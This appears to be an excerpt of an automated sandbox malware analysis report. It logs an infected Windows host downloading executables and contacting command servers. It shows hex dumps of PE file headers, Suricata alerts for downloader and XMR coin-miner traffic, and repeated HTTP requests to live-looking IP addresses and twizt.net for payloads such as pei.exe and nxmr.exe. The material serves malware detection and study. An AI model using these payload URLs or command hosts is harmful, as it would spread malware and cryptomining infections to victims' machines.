Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:04 GMTContent-Type: application/octet-streamContent-Length: 449536Last-Modified: Mon, 02 Dec 2024 07:59:26 GMTConnection: keep-aliveETag: "674d68de-6dc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 66 03 00 00 00 01 00 be c7 02 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 79 07 00 28 00 00 00 00 c0 07 00 e0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 f0 22 00 00 40 6e 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 04 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 43 7b 03 00 00 10 00 00 00 7c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 62 73 73 00 00 01 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 2e 72 64 61 74 61 00 00 9a ef 02 00 00 90 04 00 00 f0 02 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 3b 00 00 00 80 07 00 00 32 00 00 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 14 00 00 00 c0 07 00 00 16 00 00 00 a2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 22 00 00 00 e0 07 00 00 24 00 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:12 GMTContent-Type: application/octet-streamContent-Length: 5827584Last-Modified: Fri, 27 Sep 2024 20:03:46 GMTConnection: keep-aliveETag: "66f70fa2-58ec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 58 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 22 59 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 93 01 00 00 10 00 00 00 94 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 c0 de 56 00 00 b0 01 00 00 e0 56 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 f0 39 00 00 00 90 58 00 00 3a 00 00 00 78 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 58 11 00 00 00 d0 58 00 00 12 00 00 00 b2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 f4 0e 00 00 00 f0 58 00 00 10 00 00 00 c4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 80 1c 00 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 34 0a 00 00 00 20 59 00 00 0c 00 00 00 d4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 60 00 00 00 00 30 59 00 00 02 00 00 00 e0 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 59 00 00 02 00 00 00 e2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 03 00 00 00 50 59 00 00 04 00 00 00 e4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 30 03 00 00 00 60 59 00 00 04 00 00 00 e8 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

IP Address: 91.202.233.141 91.202.233.141

Source: Joe Sandbox View	ASN Name: TCIIR TCIIR
Source: Joe Sandbox View	ASN Name: KAZTELECOM-ASKZ KAZTELECOM-ASKZ

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49756 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49721 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.11:49710 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49775 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.11:49775 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49747 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49793 -> 185.215.113.84:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49781 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49800 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49819 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49833 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49838 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49860 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49903 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49912 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49922 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49933 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49941 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49963 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49971 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49981 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49991 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49953 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50003 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50020 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50028 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50033 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50035 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50041 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50048 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50046 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50054 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50057 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50050 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50068 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50070 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50080 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50055 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50052 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50059 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50071 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50073 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50089 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50078 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50082 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50064 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50077 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50087 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50084 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50075 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50045 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50038 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50031 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50010 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50085 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50063 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50066 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50061 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50036 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50043 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.11:50039 -> 185.215.113.66:5152

Source: global traffic	HTTP traffic detected: GET /pei.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /rh.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /IBSTSWSONL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
